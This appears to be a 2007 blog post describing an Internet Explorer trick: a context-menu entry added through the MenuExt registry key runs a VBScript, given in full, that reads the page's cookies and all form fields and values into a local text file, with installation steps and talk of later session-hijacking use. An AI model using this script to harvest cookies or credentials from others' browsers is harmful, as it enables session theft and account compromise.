Search This Blog

Sunday, February 11, 2007

Attacks using external.menuArgument

if you want to see the Artical in better view
http://www.codeproject.com/useritems/externalmenuArgument.asp


New way to get all web page information


The idea:  the core idea of this trick that is in Internet Explorer there is little back door to get all information of the web page and change it's content, the trick is in registry  at the key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


 


In this key you can add new item to internet explorer context menu for example if you add this key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\~~~~~~Get All Page Info~~~~


You will have this view 


Sample screenshot


 


The second part of the trick is in the next link


http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/properties/menuarguments.asp


 


The Property menuArgument gives you ability to write vb and java scripts that run on the client area and you have to know that menuArgument is part of external object


http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/external.asp


 


if you collect all that together you can write script that will be called by the menu and do what every you want to with the page, here is example that read all cookies information , all forms information and all elements in the forms then save it in text file on C:\Infomation .text


 







<script language=vbscript>
on error resume next
    set EventElement = external.menuArguments.document
    FilesFolder = "C:\MyHacks\GrappedFiles"
    set t=createobject ("SCRIPTING.FILESYSTEMOBJECT")
    if not t.FolderExists(FilesFolder) then t.CreateFolder(FilesFolder)
    strFileName = FilesFolder & "\" & CleanString( EventElement.title & "___"  & date & "_" & Time ) & ".txt"
    set l=t.OpenTextFile(strFileName,8,true)
   
    l.Write "/////////////////////////////// New Hacky ///////////////////////////////"  & vbCrLf
    l.Write "Url is = " & EventElement.url & vbCrLf
    l.Write "Page Title is = " & EventElement.title & vbCrLf
    l.Write  EventElement.cookie & vbCrLf  & vbCrLf  & vbCrLf


   


for i = 0 to EventElement.forms.length -1
    l.Write "_-_-_-_-_-_-_-_-_-_-_-_-_ Form infomration _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" & vbCrLf
          l.Write " Form Name = " & EventElement.forms.item(i).Name & vbCrLf
          l.Write " Form Action = " & EventElement.forms.item(i).action & vbCrLf
          l.Write " Form Method = " & EventElement.forms.item(i).method & vbCrLf
          l.Write " Elements Count = " & EventElement.forms.item(i).elements.length & vbCrLf
   for ele = 0 to EventElement.forms.item(i).elements.length-1
          l.Write "------------------------- Element infomration ------------------------------" &  vbCrLf
          l.Write " Information for element number " & ele + 1 & vbCrLf
          l.Write " Elements Name = " & EventElement.forms.item(i).elements.item(ele).name & vbCrLf
          l.Write " Elements Value = " & EventElement.forms.item(i).elements.item(ele).value & vbCrLf
   next
next
          l.Write vbCrLf & vbCrLf  & vbCrLf
          l.Write "Thanks to GOD to give me power to learn and teach."
          l.Write "Pray for me to learn more to be able to learn you" & vbCrLf
          l.Write "الحمد لله , الهم أرزقنى علما نافع و رزقا واسع و شفاء من كل داء"
          l.Write vbCrLf & vbCrLf  & vbCrLf 
    l.close
Function CleanString(strTarget) ' this function will clear the unacceptable characters for file name
 strTarget = Replace(strTarget, """", "-")
 strTarget = Replace(strTarget, "'", "-")
 strTarget = Replace(strTarget, "\", "-")
 strTarget = Replace(strTarget, "/", "-")
 strTarget = Replace(strTarget, "|", "-")
 strTarget = Replace(strTarget, ">", "-")
 strTarget = Replace(strTarget, "<", "-")
 strTarget = Replace(strTarget, "*", "-")
 strTarget = Replace(strTarget, ":", "-")
 strTarget = Replace(strTarget, "?", "-")
 CleanString = strTarget
End Function
external.menuArguments.window.alert("All data are in the file " & vbcrlf & vbcrlf & strFileName)
</script>



 


As you can see simple vbscript file that 100% depends on external.menuArguments , it collect the data which you want then save it on TXT file


 


In the upcoming part of this series I will give some tips on how to change in the main document and do what ever you want , it will help so much in some attacks, and I will explain how to protect the web pages against this attacks, before closing here is the steps to install this script and test it


 


Step 1: copy file HackingScript.htm to any folder and get the file path


Step 2: open " regedit " from run and navigate to the key


 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


Step 3: Add new key with the name "~~~~~~~~~Get All Page information~~~~~~~~"


Step 4: change the default key value to the HackingScript.htm path as you did in the first step


Step 5: open internet explorer and start right click and click on our new menu  


Step 6: you will find file C:\Information.txt contain all information of the page.


 


I wish you like the article, wait for the next part which will contain how to use this type in attack such "Page Simulation" and "Session HiJacking", in the next part I will explain how to protect your application against these attacks, have a nice article ;)


 


Thanks for your time


 


 


Attached to the article 2 files


HackingScript.rar :  contain the HTML file and Registry file which contain all in the article


HackingScript.exe : SFX file which can be installed directly to C:\ and add the menu to IE


 


There is one thing I want to mention somepeople ask what is going to happen if i use this script "it will get MY DATA" I just want to say that this script are able to modify things can't be done without this trick. try to use your imagination and guess what can you do with that, I write more in this topic, because it will be really harmful,:) I will explain later how to protect your web site from such things

No comments: